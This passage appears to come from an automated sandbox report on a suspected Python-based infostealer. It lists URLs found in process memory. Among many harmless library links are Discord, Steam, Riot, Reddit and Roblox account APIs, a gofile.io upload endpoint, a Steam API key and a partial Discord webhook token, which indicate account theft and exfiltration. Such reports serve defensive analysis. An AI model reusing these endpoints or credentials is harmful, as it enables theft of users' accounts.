            Source: powershell.exe, 00000045.00000002.1826414031.000001DBBF244000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: rename_me_before.exe, 00000001.00000003.1673393839.000001B100980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
            Source: rename_me_before.exe, 00000000.00000003.1660090231.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663581337.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659883292.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660201204.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659578842.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663922956.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660419536.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664519798.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660337628.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665033883.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665318433.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660005362.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659482389.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1665125906.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1663988255.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1659790847.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661117895.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664664141.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660274517.000001CF0A290000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1664424670.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1660916713.000001CF0A290000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: rename_me_before.exe, 00000001.00000003.1965506103.000001B1005D5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1975466340.000001B1005E9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965777162.000001B1005E8000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965048386.000001B10058E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
            Source: rename_me_before.exe, 00000001.00000003.1673393839.000001B100980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
            Source: rename_me_before.exe, 00000001.00000003.1673393839.000001B100980000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.riotgames.com/api/account/v1/user
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.riotgames.com/api/account/v1/user0
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.reddit.com/api/access_token
            Source: powershell.exe, 00000045.00000002.1826414031.000001DBBF011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: rename_me_before.exe, 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
            Source: rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/IPlayerService/GetSteamLevel/v1/?key=440D7F4D810EF9298D25EDDF37C1F902&s
            Source: rename_me_before.exe, 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978027683.000001B101370000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/ISteamUser/GetPlayerSummaries/v0002/?key=440D7F4D810EF9298D25EDDF37C1F9
            Source: rename_me_before.exe, 00000001.00000003.1891156202.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977125594.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1947237648.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1964107785.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1953054230.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1969941981.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977852804.000001B101140000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1971261333.000001B100CC5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1685174704.000001B100CB3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C48000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977307117.000001B100CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue37179
            Source: rename_me_before.exe, 00000001.00000002.1980252152.000001B102F50000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1963149161.000001B102173000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://canary.discord.com/api/webhooks/1263157181906419813/b4pV0iwlt5KWRU4QEOMzoONBAdBMW4nt-dNtrU5B
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/avatars/
            Source: powershell.exe, 00000045.00000002.1843174125.000001DBCF082000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000045.00000002.1843174125.000001DBCF082000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000045.00000002.1843174125.000001DBCF082000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: rename_me_before.exe, 00000000.00000003.1662701366.000001CF0A295000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://cryptography.io
            Source: METADATA0.0.drString found in binary or memory: https://cryptography.io/
            Source: rename_me_before.exe, 00000000.00000003.1662701366.000001CF0A295000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://cryptography.io/en/latest/changelog/
            Source: rename_me_before.exe, 00000000.00000003.1662701366.000001CF0A295000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://cryptography.io/en/latest/installation/
            Source: rename_me_before.exe, 00000000.00000003.1662701366.000001CF0A295000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://cryptography.io/en/latest/security/
            Source: rename_me_before.exe, 00000001.00000002.1978027683.000001B101370000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc5246#section-7.4.1.4.1
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v8/users/
            Source: rename_me_before.exe, 00000001.00000003.1891156202.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977125594.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1947237648.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1964107785.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1953054230.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1969941981.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977852804.000001B101140000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1971261333.000001B100CC5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1685174704.000001B100CB3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C48000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977307117.000001B100CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.aiohttp.org/en/stable/client_advanced.html#proxy-support
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-profile/customizi
            Source: rename_me_before.exe, 00000001.00000003.1965506103.000001B1005D5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1975466340.000001B1005E9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965777162.000001B1005E8000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965048386.000001B10058E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
            Source: rename_me_before.exe, 00000001.00000002.1977125594.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1964107785.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1953054230.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977852804.000001B101140000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1685174704.000001B100CB3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/asyncio-eventloop.html
            Source: rename_me_before.exe, 00000001.00000003.1970570414.000001B100618000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1971203694.000001B10061B000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965506103.000001B1005D5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1675049880.000001B100613000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966055870.000001B100617000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1975666963.000001B10061C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1677223508.000001B100613000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1673647231.000001B100613000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1671664245.000001B100613000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965777162.000001B1005E8000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1670798799.000001B100615000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965048386.000001B10058E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/multiprocessing.html
            Source: rename_me_before.exe, 00000001.00000003.1891156202.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1947237648.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1969941981.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1971261333.000001B100CC5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1685174704.000001B100CB3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977938973.000001B101240000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C48000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977307117.000001B100CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/ssl.html#ssl.OP_NO_COMPRESSION
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://economy.roblox.com/v1/users/
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://filepreviews.io/
            Source: svchost.exe, 0000002A.00000003.1749773200.000001D218CC2000.00000004.00000800.00020000.00000000.sdmp, edb.log.42.dr, qmgr.db.42.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
            Source: edb.log.42.dr, qmgr.db.42.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
            Source: edb.log.42.dr, qmgr.db.42.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
            Source: edb.log.42.dr, qmgr.db.42.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
            Source: svchost.exe, 0000002A.00000003.1749773200.000001D218CC2000.00000004.00000800.00020000.00000000.sdmp, edb.log.42.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
            Source: powershell.exe, 00000045.00000002.1826414031.000001DBBF244000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: rename_me_before.exe, 00000001.00000003.1965401133.000001B17E4F0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966237596.000001B17E535000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1981201596.000001B17E536000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1667996233.000001B17E531000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1668933285.000001B17E528000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1669358961.000001B17E510000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1670306810.000001B17E523000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1668055844.000001B17E535000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1669127853.000001B17E528000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965746028.000001B17E529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
            Source: rename_me_before.exe, 00000001.00000003.1891156202.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977125594.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1947237648.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1964107785.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1953054230.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1969941981.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977852804.000001B101140000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1971261333.000001B100CC5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1685174704.000001B100CB3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C48000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977307117.000001B100CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/aio-libs/aiohttp/discussions/6044
            Source: rename_me_before.exe, 00000000.00000003.1662701366.000001CF0A295000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://github.com/pyca/cryptography
            Source: rename_me_before.exe, 00000000.00000003.1662701366.000001CF0A295000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://github.com/pyca/cryptography/
            Source: rename_me_before.exe, 00000000.00000003.1662701366.000001CF0A295000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://github.com/pyca/cryptography/actions?query=workflow%3ACI
            Source: METADATA0.0.drString found in binary or memory: https://github.com/pyca/cryptography/issues
            Source: rename_me_before.exe, 00000000.00000003.1662701366.000001CF0A295000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/python-attrs/attrs
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/python-attrs/attrs)
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/python-attrs/attrs/blob/main/.github/CONTRIBUTING.md)
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/python-attrs/attrs/issues/1141)
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661709047.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/python-attrs/attrs/issues/1158)
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661709047.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/python-attrs/attrs/issues/1165)
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661709047.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/python-attrs/attrs/issues/1172)
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661709047.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/python-attrs/attrs/issues/1187)
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661709047.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/python-attrs/attrs/issues/1200)
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661709047.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/python-attrs/attrs/issues/1203)
            Source: rename_me_before.exe, 00000001.00000002.1975958598.000001B1006A7000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965506103.000001B1005D5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966055870.000001B100617000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1970448147.000001B1006A7000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1679845016.000001B100B67000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1968725950.000001B1006A6000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966129249.000001B100693000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965777162.000001B1005E8000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1679845016.000001B100BB8000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965048386.000001B10058E000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1679902734.000001B1009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/136
            Source: rename_me_before.exe, 00000001.00000003.1963524951.000001B100A7B000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1953054230.000001B100A7B000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1967857671.000001B100A7E000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1964107785.000001B100A7B000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1971346591.000001B100B51000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1976903040.000001B100B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/251
            Source: rename_me_before.exe, 00000001.00000002.1975958598.000001B1006A7000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965506103.000001B1005D5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966055870.000001B100617000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1970448147.000001B1006A7000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1679845016.000001B100B67000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1968725950.000001B1006A6000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966129249.000001B100693000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965777162.000001B1005E8000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1679845016.000001B100BB8000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965048386.000001B10058E000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1679902734.000001B1009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python-attrs/attrs/issues/428
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/python-attrs/attrs/wiki/Extensions-to-attrs)
            Source: rename_me_before.exe, 00000001.00000003.1667996233.000001B17E531000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1981358821.000001B17FEA8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
            Source: rename_me_before.exe, 00000001.00000003.1965746028.000001B17E529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
            Source: rename_me_before.exe, 00000001.00000003.1965401133.000001B17E4F0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966237596.000001B17E535000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1981201596.000001B17E536000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1667996233.000001B17E531000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1668933285.000001B17E528000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1669358961.000001B17E510000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1670306810.000001B17E523000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1668055844.000001B17E535000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1669127853.000001B17E528000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965746028.000001B17E529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
            Source: rename_me_before.exe, 00000001.00000003.1968595963.000001B1005C0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1669775645.000001B1005E2000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1670268190.000001B100598000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1669887991.000001B1005BF000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1968509131.000001B1005BD000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966526691.000001B1005BC000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1673647231.000001B100579000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1670211447.000001B10058C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1671664245.000001B10058C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1975257853.000001B1005C1000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1670048680.000001B1005C3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1669837588.000001B1005F9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965048386.000001B10058E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
            Source: rename_me_before.exe, 00000001.00000003.1891156202.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977125594.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1947237648.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1964107785.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1953054230.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1969941981.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977852804.000001B101140000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1971261333.000001B100CC5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1685174704.000001B100CB3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C48000.00000004.00000020.00020000.00000000.sdmp, 